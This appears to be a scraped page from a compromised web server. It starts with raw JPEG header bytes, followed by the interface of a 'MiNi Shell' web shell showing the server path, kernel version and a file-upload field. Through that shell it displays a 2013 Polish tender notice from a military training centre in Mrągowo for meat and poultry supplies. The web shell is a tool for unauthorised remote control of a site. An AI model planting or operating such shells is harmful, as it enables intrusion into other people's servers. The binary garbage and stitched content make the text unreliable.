JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130103/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130103/3514-N-2013.html

<p class="kh_header"><b>Mrągowo: Dostawa produktów zwierzęcych, mięsa i produktów mięsnych</b><br>
<b>Numer ogłoszenia: 3514 - 2013; data zamieszczenia: 03.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojskowy Ośrodek Szkoleniowo-Kondycyjny Mrągowo , ul. Półwysep 4-Wiatrów 1, 11-700 Mrągowo, woj. warmińsko-mazurskie, tel. 0-89 7410101, 7410110, faks 0-89 7410125.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: WJB.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa produktów zwierzęcych, mięsa i produktów mięsnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sukcesywna dostawa mięsa (wieprzowego, wołowego) oraz wędlin (z wieprzowiny, wołowiny,) do WOSZK w Mrągowie. 

Lp.	Nazwa produktu	Jm	Ilość w roku	Wymagania jakościowe
1.		udziec wołowy b/k świeży kl.1	kg	400,00	PN-88/A-82003:1988
2.		schab wieprzowy b/k	kg	1010,00	PN-88/A-82002:1986
3.		karkówka wieprzowa b/k	kg	1900,00	PN-88/A-82002:1986
4.		żeberka wieprzowe	kg	560,00	PN-88/A-82002:1986
5.		golonka wieprzowa tylna z/k	kg	440,00	PN-88/A-82002:1986
6.		boczek świeży	kg	470,00	PN-88/A-82002:1986
1.		wątroba wieprzowa	kg	102,00	PN-86/A-82004:1986
2.		ozory wieprzowe	kg	67,00	PN-86/A-82004:1986
3.		flaki wołowe krojone mrożone	kg	210,00	PN-86/A-82004:1986
4.		baleron	kg	212,00	PN-A-82032:2005
5.		Kiełbasa krakowska parzona	kg	105,00	PN-A-82025:2001
6.		kiełbasa krakowska sucha	kg	112,00	PN-A-82025:2001
7.		serdelki wieprzowe	kg	230,00	PN-A-82007:1996
8.		polędwica sopocka	kg	215,00	PN-A-82031
9.		wędzonka myśliwska	kg	169,00	PN-A-82033:2005
10.		wędzonka krotoszyńska	kg	91,00	PN-A-82033:2005
11.		ogonówka wędzona	kg	230,00	PN-A-82033:2005
12.		kiełbasa szynkowa wieprzowa specjalna	kg	186,00	PN-A-82007:1996
13.		kiełbasa podwawelska	kg	225,00	PN-A-82007:1996
14.		kiełbasa podlaska specjalna	kg	13,00	PN-A-82007:1996
15.		kiełbasa śląska	kg	20,00	PN-A-82007:1996
16.		kiełbasa żywiecka	kg	111,00	PN-A-82028:2002

17.		kiełbasa mazurska	kg	87,00	PN-A-82007:1996
18.		kiełbasa myśliwska sucha	kg	72,00	PN-A-82007:1996
19.		kielbasa toruńska	kg	220,00	PN-A-82007:1996
20.		kiełbasa biała	kg	177,00	PN-A-82007:1996
21.		kiełbasa szynkowa wołowa specjalna	kg	16,00	PN-A-82007:1996
22.		szynka konserwowa	kg	90,00	PN-A-82007:1996
23.		schab pieczony królewski	kg	81,00	PN-A-82007:1996
24.		karkówka pieczona	kg	184,00	PN-A-82007:1996
25.		boczek wędzony parzony b/k	kg	15,00	PN-A-82007:1996
26.		rolada z boczku	kg	150,00	PN-A-82007:1996
27.		kaszanka z kaszy gryczanej	kg	66,00	PN-A-82007:1996
28.		szynka wędzona	kg	172,00	PN-A-86526:1995
29.		kiełbasa salami	kg	167,00	PN-A-82007:1996
30.		golonka konserwowa	kg	132,00	PN-A-82007:1996
31.		Szynka prasowana peklowana	kg	99,00	PN-A-82007:1996
32.		Salceson ozorkowy	kg	12,00	PN-A-82007:1996
33.		Szynka wieprzowa mielona	kg	20,00	PN-A-82007:1996
34.		łopatka pieczona	kg	144,00	PN-A-82007:1996
35.		rolada schabowa	kg	75,00	PN-A-82007:1996


Przedmiot zamówienia w zakresie zadania nr 2 dotyczy  dostawy mięsa i wędlin drobiowych.

Sukcesywna dostawa mięsa drobiowego do WOSZK w Mrągowie. 

Lp. 	Nazwa produktu	Jm	Ilość w roku	Wymagania jakościowe
1.		Uda całe z kurczaka 	kg	1130,00	PN-88/A-82002
2.		filet z piersi kurczaka b/k świeży	kg	550,00	PN-88/A-82002
3.		wątroba z kurczaka świeża	kg	31,00	PN-A-86523:1995
4.		porcja rosołowa z kurczaka	kg	210,00	PN-A-86526:1995
5.		żołądki kurczaka świeże	kg	225,00	PN-A-86523:1995
6.		pierś kurczaka wędzona	kg	165,00	PN-A-86526:1995
7.		polędwica drobiowa	kg	12,00	PN-A-86526:1995
8.		szynka drobiowa	kg	46,00	PN-A-86526:1995.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 20 % zadania podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące:
1)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.
	2)	posiadania wiedzy i doświadczenia,
zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
3)	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
	4)	sytuacji ekonomicznej i finansowej,
zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
	
2. Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu podlegać będą wykluczeniu z udziału w postępowaniu. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.

3. Z udziału w niniejszym postępowaniu wyklucza się wykonawców, którzy podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 Prawa zamówień publicznych.

4. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna.
5. Ocena ofert w zakresie poszczególnych zadań będzie niezależna od siebie. Odrzucenie oferty Wykonawcy w zakresie jednego zadania nie powoduje automatycznie odrzucenia jego oferty w zakresie innego zadania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zaświadczenie właściwego organu Państwowej Inspekcji Sanitarnej lub organu Inspekcji Weterynaryjnej o sprawowaniu nadzoru nad stosowaniem zasad wdrożonego systemu HACCP. Przedłożone na tej podstawie zaświadczenie winno potwierdzać, że Wykonawca wdrożył oraz stosuje zasady systemu HACCP (Podstawa prawna : art. 59 i 73 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia Dz. U. z 2010 r. nr 136, poz. 914 z późn.zm);
lub
certyfikat HACCP.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.woszk.mragowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nazwa zamawiającego 	WOSzK Mrągowo
Adres zamawiającego 	Półwysep Czterech Wiatrów
Kod Miejscowość 	11-700 Mrągowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.01.2013 godzina 10:00, miejsce: WOSzK Mrągowo
Półwysep Czterech Wiatrów
11-700 Mrągowo
Kancelaria Jawna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sukcesywna dostawa mięsa (wieprzowego, wołowego) oraz wędlin (z wieprzowiny, wołowiny,) do WOSZK w Mrągowie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu	Jm	Ilość w roku	Wymagania jakościowe
1.		udziec wołowy b/k świeży kl.1	kg	400,00	PN-88/A-82003:1988
2.		schab wieprzowy b/k	kg	1010,00	PN-88/A-82002:1986
3.		karkówka wieprzowa b/k	kg	1900,00	PN-88/A-82002:1986
4.		żeberka wieprzowe	kg	560,00	PN-88/A-82002:1986
5.		golonka wieprzowa tylna z/k	kg	440,00	PN-88/A-82002:1986
6.		boczek świeży	kg	470,00	PN-88/A-82002:1986
1.		wątroba wieprzowa	kg	102,00	PN-86/A-82004:1986
2.		ozory wieprzowe	kg	67,00	PN-86/A-82004:1986
3.		flaki wołowe krojone mrożone	kg	210,00	PN-86/A-82004:1986
4.		baleron	kg	212,00	PN-A-82032:2005
5.		Kiełbasa krakowska parzona	kg	105,00	PN-A-82025:2001
6.		kiełbasa krakowska sucha	kg	112,00	PN-A-82025:2001
7.		serdelki wieprzowe	kg	230,00	PN-A-82007:1996
8.		polędwica sopocka	kg	215,00	PN-A-82031
9.		wędzonka myśliwska	kg	169,00	PN-A-82033:2005
10.		wędzonka krotoszyńska	kg	91,00	PN-A-82033:2005
11.		ogonówka wędzona	kg	230,00	PN-A-82033:2005
12.		kiełbasa szynkowa wieprzowa specjalna	kg	186,00	PN-A-82007:1996
13.		kiełbasa podwawelska	kg	225,00	PN-A-82007:1996
14.		kiełbasa podlaska specjalna	kg	13,00	PN-A-82007:1996
15.		kiełbasa śląska	kg	20,00	PN-A-82007:1996
16.		kiełbasa żywiecka	kg	111,00	PN-A-82028:2002

17.		kiełbasa mazurska	kg	87,00	PN-A-82007:1996
18.		kiełbasa myśliwska sucha	kg	72,00	PN-A-82007:1996
19.		kielbasa toruńska	kg	220,00	PN-A-82007:1996
20.		kiełbasa biała	kg	177,00	PN-A-82007:1996
21.		kiełbasa szynkowa wołowa specjalna	kg	16,00	PN-A-82007:1996
22.		szynka konserwowa	kg	90,00	PN-A-82007:1996
23.		schab pieczony królewski	kg	81,00	PN-A-82007:1996
24.		karkówka pieczona	kg	184,00	PN-A-82007:1996
25.		boczek wędzony parzony b/k	kg	15,00	PN-A-82007:1996
26.		rolada z boczku	kg	150,00	PN-A-82007:1996
27.		kaszanka z kaszy gryczanej	kg	66,00	PN-A-82007:1996
28.		szynka wędzona	kg	172,00	PN-A-86526:1995
29.		kiełbasa salami	kg	167,00	PN-A-82007:1996
30.		golonka konserwowa	kg	132,00	PN-A-82007:1996
31.		Szynka prasowana peklowana	kg	99,00	PN-A-82007:1996
32.		Salceson ozorkowy	kg	12,00	PN-A-82007:1996
33.		Szynka wieprzowa mielona	kg	20,00	PN-A-82007:1996
34.		łopatka pieczona	kg	144,00	PN-A-82007:1996
35.		rolada schabowa	kg	75,00	PN-A-82007:1996.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sukcesywna dostawa mięsa drobiowego do WOSZK w Mrągowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp. 	Nazwa produktu	Jm	Ilość w roku	Wymagania jakościowe
1.		Uda całe z kurczaka 	kg	1130,00	PN-88/A-82002
2.		filet z piersi kurczaka b/k świeży	kg	550,00	PN-88/A-82002
3.		wątroba z kurczaka świeża	kg	31,00	PN-A-86523:1995
4.		porcja rosołowa z kurczaka	kg	210,00	PN-A-86526:1995
5.		żołądki kurczaka świeże	kg	225,00	PN-A-86523:1995
6.		pierś kurczaka wędzona	kg	165,00	PN-A-86526:1995
7.		polędwica drobiowa	kg	12,00	PN-A-86526:1995
8.		szynka drobiowa	kg	46,00	PN-A-86526:1995.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com